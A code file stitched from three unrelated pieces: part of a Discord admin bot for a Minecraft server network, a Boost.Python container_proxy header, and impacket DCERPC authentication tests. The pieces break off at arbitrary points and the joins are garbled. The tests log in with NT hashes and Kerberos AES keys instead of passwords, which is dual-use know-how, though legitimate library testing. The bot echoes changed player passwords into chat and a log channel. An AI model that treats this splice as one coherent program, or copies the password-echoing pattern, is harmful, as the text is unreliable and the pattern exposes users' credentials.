if data[1] == "": await ctx.send("Invalid command to send"); return "invalid_cmd"
try:
p = await sendcmd(ctx, data[0], data[1])
except:
await ctx.reply("There was a error in sending the command")
return
if p != "done": return
embed = discord.Embed(title="Admin - Send Command", url="https://moonball.io", color=embed_color)
embed.set_author(name=f"{embed_header}")
embed.add_field(name="Operation Successful!", value=f"Successfully Sent the Command. Issued by {ctx.author.name}#{ctx.author.discriminator} \n \n**Server** - `{data[0]}` \n **Command** - `{data[1]}`",inline=False)
embed.set_footer(text=f"{embed_footer}")
await ctx.reply(embed=embed)
await embed_log.send(embed=embed) # Sending it to the Logs channel
await logger("a", f'{ctx.author.name}#{ctx.author.discriminator} sent a command to `{data[0]}`', "admin", f'{ctx.author.name}#{ctx.author.discriminator} sent a command to `{data[0]}`')
# Economy Commands
@admin.command(aliases=['takemoney', 'take', 'take_money'])
@commands.has_permissions(administrator=True)
async def take_money_admin(ctx, *data): # Take Money Admin Command
if len(data[0]) <= 3 or len(data[0]) >= 16: await ctx.send("Invalid Username"); return "invalid_username"
elif not data[1].isnumeric(): await ctx.send("Invalid Amount"); return "invalid_amount"
try:
p = await sendcmd(ctx, "survival", f"eco take {data[0]} {data[1]}")
except:
await ctx.reply("There was a error in sending the command"); return
if p != "done": return
embed = discord.Embed(title="Admin - Take Money", url="https://moonball.io", color=embed_color)
embed.set_author(name=f"{embed_header}")
embed.add_field(name="Operation Successful!", value=f"Successfully took {data[1]} from {data[0]} \n \n**User** - `{data[0]}` \n **Amount** - `{data[1]}`",inline=False)
embed.set_footer(text=f"{embed_footer}")
await ctx.reply(embed=embed)
await embed_log.send(embed=embed) # Sending it to the Logs channel
await logger("a", f'{ctx.author.name}#{ctx.author.discriminator} took {data[1]} from {data[0]}', "admin", f'{ctx.author.name}#{ctx.author.discriminator} took {data[1]} from {data[0]}')
@admin.command(aliases=['givemoney', 'give', 'give_money'])
@commands.has_permissions(administrator=True)
async def give_money_admin(ctx, *data): # Take Money Admin Command
if len(data[0]) <= 3 or len(data[0]) >= 16: await ctx.send("Invalid User Name"); return
elif not data[1].isnumeric(): await ctx.send("Invalid Amount"); return
try:
p = await sendcmd(ctx, "survival", f"eco give {data[0]} {data[1]}")
except:
await ctx.reply("There was a error in sending the command")
return
if p != "done": return
embed = discord.Embed(title="Admin - Take Money", url="https://moonball.io", color=embed_color)
embed.set_author(name=f"{embed_header}")
embed.add_field(name="Operation Successful!", value=f"Successfully gave {data[1]} from {data[0]} \n \n**User** - `{data[0]}` \n **Amount** - `{data[1]}`",inline=False)
embed.set_footer(text=f"{embed_footer}")
await ctx.reply(embed=embed)
await embed_log.send(embed=embed) # Sending it to the Logs channel
await logger("a", f'{ctx.author.name}#{ctx.author.discriminator} gave {data[1]} to {data[0]}', "admin", f'{ctx.author.name}#{ctx.author.discriminator} gave {data[1]} to {data[0]}')
# Change Server Power
@admin.command(aliases=['changepw', 'changepassword', 'pw', 'password'])
@commands.has_permissions(administrator=True)
async def changepw_admin(ctx, *data): # Change Password Command
if len(data[0]) <= 3 or len(data[0]) >= 16:
await ctx.send("Invalid Username | Username must be between 3 and 16 characters")
return "invalid_username"
# Format = +admin changepw | username | password
if len(data[1]) <= 5 or len(data[1]) >= 30:
await ctx.send("Invalid Password | Password must be between 6 and 30 characters")
return "invalid_password"
cmd = f"authme cp {data[0]} {data[1]}"
try:
p = await sendcmd(ctx, "auth", cmd)
except:
await ctx.reply("There was a error in sending the command")
return
if p != "done": return
embed = discord.Embed(title="Admin - Change Password", url="https://moonball.io", color=embed_color)
embed.set_author(name=f"{embed_header}")
embed.add_field(name="Operation Successful!",value=f"Successfully Changed the Password. Issued by {ctx.author.name}#{ctx.author.discriminator} \n \n**Player** - `{data[0]}` \n **Password** - ||{data[1]}||",inline=False)
embed.set_footer(text=f"{embed_footer}")
await ctx.reply(embed=embed)
await embed_log.send(embed=embed) # Sending it to the Logs channel
await logger("a", f'{ctx.author.name}#{ctx.author.discriminator} changed the password of {data[0]}', "admin", f'{ctx.author.name}#{ctx.author.discriminator} changed the password of {data[0]}')
# Power Commands
@admin.command(aliases=['startserver', 'serverstart', 'ss', 'start'])
@commands.has_permissions(administrator=True)
async def start_admin(ctx, *data): # Start Server Command
data = " ".join(data).split() # Input Splitter
valid_names = ["proxy", "limbo", "auth", "lobby", "survival", "skyblock", "duels", "bedwars", "bot", "parkour"]
if data[0] not in valid_names:
await ctx.reply(f"Error : Invalid Server Name. Use `{prefix}admin css` to learn more!")
return
try:
e = await serverpower(data[0], "start", ctx)
except:
await ctx.reply(f"There was an error. Use `{prefix}admin css` to learn more")
return
if e == "exception": return
embed = discord.Embed(title="Server Power", url="https://moonball.io/",description=f"Starts/Stops/Restarts or Kills a specific server on command.\n `{prefix}admin css` to learn more!", color=embed_color)
embed.set_author(name=f"{embed_header}")
embed.add_field(name=f'Operation Successful!', value=f'Successfully Started the {data[0].capitalize()} Server!', inline=False)
embed.set_footer(text=f"{embed_footer}")
await ctx.reply(embed=embed)
await embed_log.send(embed=embed) # Sending it to the Logs channel
@admin.command(aliases=['stopserver', 'serverstop', 'sts', 'stop'])
@commands.has_permissions(administrator=True)
async def stop_admin(ctx, *data): # Stop Server Command
data = " ".join(data).split() # Input Splitter
valid_names = ["proxy", "limbo", "auth", "lobby", "survival", "skyblock", "duels", "bedwars", "bot", "parkour"]
if data[0] not in valid_names:
await ctx.reply(f"Error : Invalid Server Name. Use `{prefix}admin css` to learn more!")
return
try:
e = await serverpower(data[0], "stop", ctx)
except:
await ctx.reply(f"There was an error. Use `{prefix}admin css` to learn more")
return
if e == "exception": return
embed = discord.Embed(title="Server Power", url="https://moonball.io/",description=f"Starts/Stops/Restarts or Kills a specific server on command.\n `{prefix}admin css` to learn more!",color=embed_color)
embed.set_author(name=f"{embed_header}")
embed.add_field(name=f'Operation Successful!', value=f'Successfully Stopped the {data[0].capitalize()} Server!',inline=False)
embed.set_footer(text=f"{embed_footer}")
await ctx.reply(embed=embed)
await embed_log.send(embed=embed) # Sending it to the Logs channel
@admin.command(aliases=['restartserver', 'serverrestart', 'rs', 'restart'])
@commands.has_permissions(administrator=True)
async def restart_admin(ctx, *data): # Restart Server Command
data = " ".join(data).split() # Input Splitter
valid_names = ["proxy", "limbo", "auth", "lobby", "survival", "skyblock", "duels", "bedwars", "bot", "parkour"]
if data[0] not in valid_names:
await ctx.reply(f"Error : Invalid Server Name. Use `{prefix}admin css` to learn more!")
return
try: e = await serverpower(data[0], "restart", ctx)
except:
await ctx.reply(f"There was an error. Use `{prefix}admin css` to learn more")
return
if e == "exception": return
embed = discord.Embed(title="Server Power", url="https://moonball.io/",description=f"Starts/Stops/Restarts or Kills a specific server on command.\n `{prefix}admin css` to learn more!",color=embed_color)
embed.set_author(name=f"{embed_header}")
embed.add_field(name=f'Operation Successful!',value=f'Successfully Restarted the {data[0].capitalize()} Server!', inline=False)
embed.set_footer(text=f"{embed_footer}")
await ctx.reply(embed=embed)
await embed_log.send(embed=embed) # Sending it to the Logs channel
@admin.command(aliases=['killserver', 'serverkill', 'sk', 'kill'])
@commands.has_permissions(administrator=True)
async def kill_admin(ctx, *data): # Kill Server Command
data = " ".join(data).split() # Input Splitter
valid_names = ["proxy", "limbo", "auth", "lobby", "survival", "skyblock", "duels", "bedwars", "bot", "parkour"]
if data[0] not in valid_names:
await ctx.reply(f"Error : Invalid Server Name. Use `{prefix}admin css` to learn more!")
return
try:
e = await serverpower(data[0], | |
# Copyright 2004-2008 <NAME>.
# Distributed under the Boost Software License, Version 1.0. (See
# accompanying file LICENSE_1_0.txt or copy at
# http://www.boost.org/LICENSE_1_0.txt)
"""
This file contains indexing suite v2 code
"""
file_name = "indexing_suite/container_proxy.hpp"
code = r"""// Copyright (c) 2003 <NAME>
//
// Use, modification and distribution is subject to the Boost Software
// License, Version 1.0. (See accompanying file LICENSE_1_0.txt or copy
// at http://www.boost.org/LICENSE_1_0.txt)
//
// Header file container_proxy.hpp
//
// A container-wrapper that provides Python-style reference semantics
// for values stored in vector-like containers via element proxies.
//
// Class invariant:
// size() == m_proxies.size()
// for 0 <= i < size()
// m_proxies[i].get() != 0
// m_proxies[i]->owner() == this
// m_proxies[i]->index() == i
// m_proxies[i]->m_element_ptr.get() == 0
//
// History
// =======
// 2003/ 8/26 rmg File creation
// 2003/10/23 rmg Change pointer container from map to sequence
// 2008/12/08 Roman Change indexing suite layout
//
// $Id: container_proxy.hpp,v 1.1.2.28 2004/02/08 18:57:42 raoulgough Exp $
//
#ifndef BOOST_PYTHON_INDEXING_CONTAINER_PROXY_HPP
#define BOOST_PYTHON_INDEXING_CONTAINER_PROXY_HPP
#include <indexing_suite/proxy_iterator.hpp>
#include <indexing_suite/shared_proxy_impl.hpp>
#include <indexing_suite/element_proxy.hpp>
#include <indexing_suite/element_proxy_traits.hpp>
#include <indexing_suite/workaround.hpp>
#include <indexing_suite/methods.hpp>
#include <vector>
#include <cassert>
#include <boost/shared_ptr.hpp>
#include <boost/mpl/apply.hpp>
#include <boost/iterator/iterator_traits.hpp>
#include <indexing_suite/container_traits.hpp>
#include <indexing_suite/container_suite.hpp>
#include <indexing_suite/algorithms.hpp>
namespace boost { namespace python { namespace indexing {
template<typename T> struct identity {
typedef T held_type;
static T & get(T & obj) { return obj; }
static T const & get(T const & obj) { return obj; }
static T create () { return T(); }
static T copy (T const ©) { return copy; }
static void assign (T &to, T const &from) { to = from; }
static void pre_destruction (T &) { }
static void swap (T &one, T &two) { std::swap (one, two); }
};
template<typename P> struct deref {
typedef P held_type;
typedef typename boost::iterator_value<P>::type value;
static value & get (P & ptr) { return *ptr; }
static value const & get (P const & ptr) { return *ptr; }
static P create () { return P(); }
static P copy (P const ©) { return copy; }
static void assign (P &to, P const &from) { to = from; }
static void pre_destruction (P &) { }
static void swap (P &one, P &two) { std::swap (one, two); }
};
struct vector_generator {
// Generates vector type for any element type with default allocator
template<typename Element> struct apply {
typedef std::vector<Element> type;
};
};
#if BOOST_WORKAROUND (BOOST_MSVC, == 1200)
// Early template instantiation (ETI) workaround
namespace detail {
template<typename Container> struct msvc6_iterator {
typedef Container::iterator type;
};
template<> struct msvc6_iterator<int> {
typedef int *type;
};
}
#endif
template<class Container,
class Holder = identity<Container>,
class Generator = vector_generator>
class container_proxy
{
typedef container_proxy<Container, Holder, Generator> self_type;
typedef typename Container::iterator raw_iterator;
typedef ::boost::detail::iterator_traits<raw_iterator> raw_iterator_traits;
#if !defined (BOOST_NO_MEMBER_TEMPLATE_FRIENDS)
template<class C> friend class shared_proxy_impl;
template<class C, typename E, typename T, typename S, typename I>
friend class proxy_iterator;
#endif
public:
typedef typename Holder::held_type held_type;
typedef typename Container::size_type size_type;
typedef typename Container::difference_type difference_type;
typedef shared_proxy_impl<self_type> shared_proxy;
typedef typename Container::value_type raw_value_type;
typedef element_proxy<self_type> value_type;
typedef value_type reference; // Already has ref. semantics
typedef const_element_proxy<self_type> const_value_type;
typedef const_value_type const_reference; // Ref. semantics
typedef proxy_iterator <self_type, value_type, raw_iterator_traits,
size_type, raw_iterator> iterator;
typedef iterator const_iterator; // No const_iterator yet implemented
public:
// Constructors
template<typename Iter> container_proxy (Iter start, Iter finish)
// Define inline for MSVC6 compatibility
: m_held_obj (Holder::create()),
m_proxies ()
{
insert (begin(), start, finish);
}
container_proxy ();
explicit container_proxy (held_type const &h);
container_proxy (container_proxy const &);
container_proxy &operator= (container_proxy const &);
~container_proxy ();
Container const &raw_container() const; // OK to expose const reference
reference at (size_type index);
const_reference at (size_type index) const;
reference operator[] (size_type index) { return at(index); }
const_reference operator[] (size_type index) const { return at(index); }
size_type size () const { return raw_container().size(); }
size_type capacity () const { return raw_container().capacity(); }
void reserve (size_type s);
public:
iterator begin() { return iterator (this, static_cast<size_type>(0)); }
iterator end() { return iterator (this, raw_container().size()); }
iterator erase (iterator);
iterator erase (iterator, iterator);
iterator insert (iterator, raw_value_type const &);
template<typename Iter> void insert (iterator iter, Iter from, Iter to)
// Define here for MSVC6 compatibility
{
// Forward insertion to the right overloaded version
typedef typename BOOST_ITERATOR_CATEGORY<Iter>::type category;
insert (iter, from, to, category());
}
void push_back (raw_value_type const ©) { insert (end(), copy); }
value_type pop_back () {
value_type result = at (size() - 1);
erase (end() - 1);
return result;
}
public:
// These functions are useful only when client code has direct
// non-const acccess to the raw container (e.g. via an indirect
// holder supplied to our constructor). Any code that directly
// modifies the contents of the raw container (by replacing,
// inserting or erasing elements) must notify the container_proxy.
void detach_proxy (size_type index);
void detach_proxies (size_type from, size_type to);
// Call before overwriting element(s) in the raw container
void prepare_erase (size_type from, size_type to);
// Call before erasing elements directly from the raw container
void notify_insertion (size_type from, size_type to);
// Call after inserting elements directly into the raw container
public:
// Convenient replacement of elements (automatic proxy detachment)
void replace (size_type index, raw_value_type const &);
// template<typename Iter> void replace (size_type index, Iter, Iter);
void swap_elements (size_type index1, size_type index2);
bool is_valid () const; // Check the class invariant (for testing purposes)
private:
// Overloads for insertions with/without useful std::distance
template<typename Iter>
void insert (iterator iter, Iter from, Iter to, std::forward_iterator_tag)
// Define here for MSVC6 compatibility
{
assert (iter.ptr == this);
size_type count = std::distance (from, to);
// Add empty proxy pointers for the new value(s) (could throw)
m_proxies.insert (m_proxies.begin() + iter.index, count, pointer_impl());
try
{
// Insert the new element(s) into the real container (could throw)
raw_container().insert(
raw_container().begin() + iter.index,
from,
to);
try
{
// Create new proxies for the new elements (could throw)
write_proxies (iter.index, iter.index + count);
}
catch (...)
{
raw_container().erase(
raw_container().begin() + iter.index,
raw_container().begin() + iter.index + count);
throw;
}
}
catch (...)
{
m_proxies.erase(
m_proxies.begin() + iter.index,
m_proxies.begin() + iter.index + count);
throw;
}
// Adjust any proxies after the inserted elements (nothrow)
adjust_proxies(
m_proxies.begin() + iter.index + count,
m_proxies.end(),
static_cast<difference_type> (count));
}
template<typename Iter>
void insert (iterator iter, Iter from, Iter to, std::input_iterator_tag)
// Define here for MSVC6 compatibility
{
// insert overload for iterators where we *can't* get distance()
// so just insert elements one at a time
while (from != to)
{
iter = insert (iter, *from++) + 1;
}
}
private:
typedef boost::shared_ptr<shared_proxy> pointer_impl;
typedef typename mpl::apply1<Generator, pointer_impl>::type
pointer_container;
#if BOOST_WORKAROUND (BOOST_MSVC, == 1200)
typedef detail::msvc6_iterator<pointer_container>::type pointer_iterator;
#else
typedef typename pointer_container::iterator pointer_iterator;
#endif
#if defined (BOOST_NO_MEMBER_TEMPLATE_FRIENDS)
// Proxies need mutable access, and can't be friends with MSVC6
public:
#endif
Container &raw_container();
private:
void adjust_proxies (pointer_iterator, pointer_iterator, difference_type);
void write_proxies (size_type, size_type);
bool clear_proxy (pointer_impl &); // detach and do not reset
void clear_proxies (size_type, size_type); // detach and do not reset
void claim_all_proxies (); // Makes all proxies point at this object
private:
held_type m_held_obj;
pointer_container m_proxies;
};
template<class Container, class Holder, class Generator>
container_proxy<Container, Holder, Generator>
::container_proxy ()
: m_held_obj (Holder::create()),
m_proxies ()
{
// Container is empty - no further processing
}
template<class Container, class Holder, class Generator>
container_proxy<Container, Holder, Generator>
::container_proxy (held_type const &held)
: m_held_obj (Holder::copy (held)),
m_proxies (size())
{
write_proxies (0, size());
}
template<class Container, class Holder, class Generator>
container_proxy<Container, Holder, Generator>
::container_proxy (container_proxy const ©)
: m_held_obj (Holder::copy (copy.m_held_obj)),
m_proxies (size())
{
write_proxies (0, size()); // Create our own proxies for the copied values
}
template<class Container, class Holder, class Generator>
container_proxy<Container, Holder, Generator> &
container_proxy<Container, Holder, Generator>
::operator= (container_proxy const ©)
{
container_proxy<Container, Holder, Generator> temp (copy);
// This could throw, but none of the remaining operations can
Holder::swap (m_held_obj, temp.m_held_obj);
std::swap (m_proxies, temp.m_proxies);
claim_all_proxies ();
temp.claim_all_proxies (); // Prepare for detach
return *this;
// temp destruction detaches any proxies that used to belong to us
}
template<class Container, class Holder, class Generator>
container_proxy<Container, Holder, Generator>
::~container_proxy ()
{
// Copy original values into any proxies being shared by external pointers
clear_proxies (0, size());
Holder::pre_destruction (m_held_obj);
}
template<class Container, class Holder, class Generator>
Container &
container_proxy<Container, Holder, Generator>
::raw_container ()
{
return Holder::get (m_held_obj);
| |
<gh_stars>100-1000
import unittest
import ConfigParser
from impacket.dcerpc.v5.ndr import NDRCALL
from impacket.dcerpc.v5 import transport, epm, samr
from impacket.dcerpc.v5.dtypes import NULL
from impacket.dcerpc.v5.rpcrt import RPC_C_AUTHN_LEVEL_PKT_INTEGRITY, RPC_C_AUTHN_LEVEL_PKT_PRIVACY, \
RPC_C_AUTHN_LEVEL_NONE, RPC_C_AUTHN_GSS_NEGOTIATE, RPC_C_AUTHN_WINNT
from impacket.dcerpc.v5.dtypes import RPC_UNICODE_STRING
# aimed at testing just the DCERPC engine, not the particular
# endpoints (we should do specific tests for endpoints)
# here we're using EPM just beacuse we need one, and it's the
# easiest one
class DCERPCTests(unittest.TestCase):
def connectDCE(self, username, password, domain, lm='', nt='', aesKey='', TGT=None, TGS=None, tfragment=0,
dceFragment=0,
auth_type=RPC_C_AUTHN_WINNT, auth_level=RPC_C_AUTHN_LEVEL_NONE, dceAuth=True, doKerberos=False,
bind=epm.MSRPC_UUID_PORTMAP):
rpctransport = transport.DCERPCTransportFactory(self.stringBinding)
if hasattr(rpctransport, 'set_credentials'):
# This method exists only for selected protocol sequences.
rpctransport.set_credentials(username, password, domain, lm, nt, aesKey, TGT, TGS)
rpctransport.set_kerberos(doKerberos)
rpctransport.set_max_fragment_size(tfragment)
dce = rpctransport.get_dce_rpc()
dce.set_max_fragment_size(dceFragment)
if dceAuth is True:
dce.set_credentials(*(rpctransport.get_credentials()))
dce.connect()
dce.set_auth_type(auth_type)
dce.set_auth_level(auth_level)
dce.bind(bind)
return dce
def test_connection(self):
dce = self.connectDCE(self.username, self.password, self.domain, dceAuth=False)
dce.disconnect()
def test_connectionHashes(self):
lmhash, nthash = self.hashes.split(':')
dce = self.connectDCE(self.username, '', self.domain, lmhash, nthash, dceAuth=False)
dce.disconnect()
def test_dceAuth(self):
dce = self.connectDCE(self.username, self.password, self.domain, dceAuth=True)
resp = epm.hept_lookup(self.machine)
dce.disconnect()
def test_dceAuthKerberos(self):
dce = self.connectDCE(self.username, self.password, self.domain, dceAuth=True, doKerberos=True)
resp = epm.hept_lookup(self.machine)
dce.disconnect()
def test_dceAuthHasHashes(self):
lmhash, nthash = self.hashes.split(':')
dce = self.connectDCE(self.username, '', self.domain, lmhash, nthash, dceAuth=True)
resp = epm.hept_lookup(self.machine)
dce.disconnect()
def test_dceAuthHasHashesKerberos(self):
lmhash, nthash = self.hashes.split(':')
dce = self.connectDCE(self.username, '', self.domain, lmhash, nthash, dceAuth=True, doKerberos=True)
resp = epm.hept_lookup(self.machine)
dce.disconnect()
def test_dceAuthHasAes128Kerberos(self):
dce = self.connectDCE(self.username, '', self.domain, '', '', self.aesKey128, dceAuth=True, doKerberos=True)
resp = epm.hept_lookup(self.machine)
dce.disconnect()
def test_dceAuthHasAes256Kerberos(self):
dce = self.connectDCE(self.username, '', self.domain, '', '', self.aesKey256, dceAuth=True, doKerberos=True)
resp = epm.hept_lookup(self.machine)
dce.disconnect()
def test_dceTransportFragmentation(self):
lmhash, nthash = self.hashes.split(':')
dce = self.connectDCE(self.username, '', self.domain, lmhash, nthash, tfragment=1, dceAuth=True, doKerberos=False)
request = epm.ept_lookup()
request['inquiry_type'] = epm.RPC_C_EP_ALL_ELTS
request['object'] = NULL
request['Ifid'] = NULL
request['vers_option'] = epm.RPC_C_VERS_ALL
request['max_ents'] = 499
resp = dce.request(request)
dce.disconnect()
def test_dceFragmentation(self):
lmhash, nthash = self.hashes.split(':')
dce = self.connectDCE(self.username, '', self.domain, lmhash, nthash, dceFragment=1, dceAuth=True, doKerberos=False)
request = epm.ept_lookup()
request['inquiry_type'] = epm.RPC_C_EP_ALL_ELTS
request['object'] = NULL
request['Ifid'] = NULL
request['vers_option'] = epm.RPC_C_VERS_ALL
request['max_ents'] = 499
resp = dce.request(request)
dce.disconnect()
def test_bigRequestMustFragment(self):
class dummyCall(NDRCALL):
opnum = 2
structure = (
('Name', RPC_UNICODE_STRING),
)
lmhash, nthash = self.hashes.split(':')
oldBinding = self.stringBinding
self.stringBinding = epm.hept_map(self.machine, samr.MSRPC_UUID_SAMR, protocol = 'ncacn_ip_tcp')
print self.stringBinding
dce = self.connectDCE(self.username, '', self.domain, lmhash, nthash, dceFragment=0,
auth_level=RPC_C_AUTHN_LEVEL_PKT_INTEGRITY, auth_type=RPC_C_AUTHN_GSS_NEGOTIATE,
dceAuth=True,
doKerberos=True, bind=samr.MSRPC_UUID_SAMR)
self.stringBinding = oldBinding
request = samr.SamrConnect()
request['ServerName'] = u'BETO\x00'
request['DesiredAccess'] = samr.DELETE | samr.READ_CONTROL | samr.WRITE_DAC | samr.WRITE_OWNER | samr.ACCESS_SYSTEM_SECURITY | samr.GENERIC_READ | samr.GENERIC_WRITE | samr.GENERIC_EXECUTE | samr.SAM_SERVER_CONNECT | samr.SAM_SERVER_SHUTDOWN | samr.SAM_SERVER_INITIALIZE | samr.SAM_SERVER_CREATE_DOMAIN | samr.SAM_SERVER_ENUMERATE_DOMAINS | samr.SAM_SERVER_LOOKUP_DOMAIN | samr.SAM_SERVER_READ | samr.SAM_SERVER_WRITE | samr.SAM_SERVER_EXECUTE
resp = dce.request(request)
request = samr.SamrEnumerateDomainsInSamServer()
request['ServerHandle'] = resp['ServerHandle']
request['EnumerationContext'] = 0
request['PreferedMaximumLength'] = 500
resp2 = dce.request(request)
try:
request = samr.SamrLookupDomainInSamServer()
request['ServerHandle'] = resp['ServerHandle']
request['Name'] = 'A'*4500
resp = dce.request(request)
except Exception, e:
if str(e).find('STATUS_NO_SUCH_DOMAIN') < 0:
raise
dce.disconnect()
def test_dceFragmentationWINNTPacketIntegrity(self):
lmhash, nthash = self.hashes.split(':')
dce = self.connectDCE(self.username, '', self.domain, lmhash, nthash, dceFragment=1,
auth_level=RPC_C_AUTHN_LEVEL_PKT_INTEGRITY, dceAuth=True, doKerberos=False)
request = epm.ept_lookup()
request['inquiry_type'] = epm.RPC_C_EP_ALL_ELTS
request['object'] = NULL
request['Ifid'] = NULL
request['vers_option'] = epm.RPC_C_VERS_ALL
request['max_ents'] = 499
resp = dce.request(request)
dce.disconnect()
def test_dceFragmentationWINNTPacketPrivacy(self):
lmhash, nthash = self.hashes.split(':')
dce = self.connectDCE(self.username, '', self.domain, lmhash, nthash, dceFragment=1,
auth_level=RPC_C_AUTHN_LEVEL_PKT_PRIVACY, dceAuth=True, doKerberos=False)
request = epm.ept_lookup()
request['inquiry_type'] = epm.RPC_C_EP_ALL_ELTS
request['object'] = NULL
request['Ifid'] = NULL
request['vers_option'] = epm.RPC_C_VERS_ALL
request['max_ents'] = 499
resp = dce.request(request)
dce.disconnect()
def test_dceFragmentationKerberosPacketIntegrity(self):
lmhash, nthash = self.hashes.split(':')
dce = self.connectDCE(self.username, '', self.domain, lmhash, nthash, dceFragment=1,
auth_type=RPC_C_AUTHN_GSS_NEGOTIATE,
auth_level=RPC_C_AUTHN_LEVEL_PKT_INTEGRITY, dceAuth=True, doKerberos=True)
request = epm.ept_lookup()
request['inquiry_type'] = epm.RPC_C_EP_ALL_ELTS
request['object'] = NULL
request['Ifid'] = NULL
request['vers_option'] = epm.RPC_C_VERS_ALL
request['max_ents'] = 499
resp = dce.request(request)
dce.disconnect()
def test_dceFragmentationKerberosPacketPrivacy(self):
lmhash, nthash = self.hashes.split(':')
dce = self.connectDCE(self.username, '', self.domain, lmhash, nthash, dceFragment=1,
auth_type=RPC_C_AUTHN_GSS_NEGOTIATE,
auth_level=RPC_C_AUTHN_LEVEL_PKT_PRIVACY, dceAuth=True, doKerberos=True)
request = epm.ept_lookup()
request['inquiry_type'] = epm.RPC_C_EP_ALL_ELTS
request['object'] = NULL
request['Ifid'] = NULL
request['vers_option'] = epm.RPC_C_VERS_ALL
request['max_ents'] = 499
resp = dce.request(request)
dce.disconnect()
def test_WINNTPacketIntegrity(self):
dce = self.connectDCE(self.username, self.password, self.domain, auth_level=RPC_C_AUTHN_LEVEL_PKT_INTEGRITY,
dceAuth=True, doKerberos=False)
request = epm.ept_lookup()
request['inquiry_type'] = epm.RPC_C_EP_ALL_ELTS
request['object'] = NULL
request['Ifid'] = NULL
request['vers_option'] = epm.RPC_C_VERS_ALL
request['max_ents'] = 499
resp = dce.request(request)
dce.disconnect()
def test_KerberosPacketIntegrity(self):
dce = self.connectDCE(self.username, self.password, self.domain, auth_type=RPC_C_AUTHN_GSS_NEGOTIATE,
auth_level=RPC_C_AUTHN_LEVEL_PKT_INTEGRITY, dceAuth=True, doKerberos=True)
request = epm.ept_lookup()
request['inquiry_type'] = epm.RPC_C_EP_ALL_ELTS
request['object'] = NULL
request['Ifid'] = NULL
request['vers_option'] = epm.RPC_C_VERS_ALL
request['max_ents'] = 499
resp = dce.request(request)
resp = dce.request(request)
resp.dump()
dce.disconnect()
def test_HashesWINNTPacketIntegrity(self):
lmhash, nthash = self.hashes.split(':')
dce = self.connectDCE(self.username, '', self.domain, lmhash, nthash,
auth_level=RPC_C_AUTHN_LEVEL_PKT_INTEGRITY, dceAuth=True, doKerberos=False)
request = epm.ept_lookup()
request['inquiry_type'] = epm.RPC_C_EP_ALL_ELTS
request['object'] = NULL
request['Ifid'] = NULL
request['vers_option'] = epm.RPC_C_VERS_ALL
request['max_ents'] = 499
resp = dce.request(request)
dce.disconnect()
def test_HashesKerberosPacketIntegrity(self):
lmhash, nthash = self.hashes.split(':')
dce = self.connectDCE(self.username, '', self.domain, lmhash, nthash, auth_type=RPC_C_AUTHN_GSS_NEGOTIATE,
auth_level=RPC_C_AUTHN_LEVEL_PKT_INTEGRITY, dceAuth=True, doKerberos=True)
request = epm.ept_lookup()
request['inquiry_type'] = epm.RPC_C_EP_ALL_ELTS
request['object'] = NULL
request['Ifid'] = NULL
request['vers_option'] = epm.RPC_C_VERS_ALL
request['max_ents'] = 499
resp = dce.request(request)
resp = dce.request(request)
resp.dump()
dce.disconnect()
def test_Aes128KerberosPacketIntegrity(self):
dce = self.connectDCE(self.username, '', self.domain, '', '', self.aesKey128,
auth_type=RPC_C_AUTHN_GSS_NEGOTIATE, auth_level=RPC_C_AUTHN_LEVEL_PKT_INTEGRITY,
dceAuth=True, doKerberos=True)
request = epm.ept_lookup()
request['inquiry_type'] = epm.RPC_C_EP_ALL_ELTS
request['object'] = NULL
request['Ifid'] = NULL
request['vers_option'] = epm.RPC_C_VERS_ALL
request['max_ents'] = 499
resp = dce.request(request)
resp = dce.request(request)
resp.dump()
dce.disconnect()
def test_Aes256KerberosPacketIntegrity(self):
dce = self.connectDCE(self.username, '', self.domain, '', '', self.aesKey256,
auth_type=RPC_C_AUTHN_GSS_NEGOTIATE, auth_level=RPC_C_AUTHN_LEVEL_PKT_INTEGRITY,
dceAuth=True, doKerberos=True)
request = epm.ept_lookup()
request['inquiry_type'] = epm.RPC_C_EP_ALL_ELTS
request['object'] = NULL
request['Ifid'] = NULL
request['vers_option'] = epm.RPC_C_VERS_ALL
request['max_ents'] = 499
resp = dce.request(request)
resp = dce.request(request)
resp.dump()
dce.disconnect()
def test_packetAnonWINNTPacketIntegrity(self):
# With SMB Transport this will fail with STATUS_ACCESS_DENIED
try:
dce = self.connectDCE('', '', '', auth_level=RPC_C_AUTHN_LEVEL_PKT_INTEGRITY,dceAuth=False, doKerberos=False)
request = epm.ept_lookup()
request['inquiry_type'] = epm.RPC_C_EP_ALL_ELTS
request['object'] = NULL
request['Ifid'] = NULL
request['vers_option'] = epm.RPC_C_VERS_ALL
request['max_ents'] = 499
resp = dce.request(request)
dce.disconnect()
except Exception, e:
if not (str(e).find('STATUS_ACCESS_DENIED') >=0 and self.stringBinding.find('ncacn_np') >=0):
raise
def test_WINNTPacketPrivacy(self):
dce = self.connectDCE(self.username, self.password, self.domain, auth_level=RPC_C_AUTHN_LEVEL_PKT_PRIVACY,
dceAuth=True, doKerberos=False)
request = epm.ept_lookup()
request['inquiry_type'] = epm.RPC_C_EP_ALL_ELTS
request['object'] = NULL
request['Ifid'] = NULL
request['vers_option'] = epm.RPC_C_VERS_ALL
request['max_ents'] = 499
resp = dce.request(request)
resp = dce.request(request)
dce.disconnect()
def test_KerberosPacketPrivacy(self):
dce = self.connectDCE(self.username, self.password, self.domain, auth_type=RPC_C_AUTHN_GSS_NEGOTIATE,
auth_level=RPC_C_AUTHN_LEVEL_PKT_PRIVACY, dceAuth=True, doKerberos=True)
request = epm.ept_lookup()
request['inquiry_type'] = epm.RPC_C_EP_ALL_ELTS
request['object'] = NULL
request['Ifid'] = NULL
request['vers_option'] = epm.RPC_C_VERS_ALL
request['max_ents'] = 499
resp = dce.request(request)
resp = dce.request(request)
resp.dump()
dce.disconnect()
def test_HashesWINNTPacketPrivacy(self):
lmhash, nthash = self.hashes.split(':')
dce = self.connectDCE(self.username, '', self.domain, lmhash, nthash, auth_level=RPC_C_AUTHN_LEVEL_PKT_PRIVACY,
dceAuth=True, doKerberos=False)
request = epm.ept_lookup()
request['inquiry_type'] = epm.RPC_C_EP_ALL_ELTS
request['object'] = NULL
request['Ifid'] = NULL
request['vers_option'] = epm.RPC_C_VERS_ALL
request['max_ents'] = 499
resp = dce.request(request)
dce.disconnect()
def test_HashesKerberosPacketPrivacy(self):
lmhash, nthash = self.hashes.split(':')
dce = self.connectDCE(self.username, '', self.domain, lmhash, nthash, auth_type=RPC_C_AUTHN_GSS_NEGOTIATE,
auth_level=RPC_C_AUTHN_LEVEL_PKT_PRIVACY, dceAuth=True, doKerberos=True)
request = epm.ept_lookup()
request['inquiry_type'] = epm.RPC_C_EP_ALL_ELTS
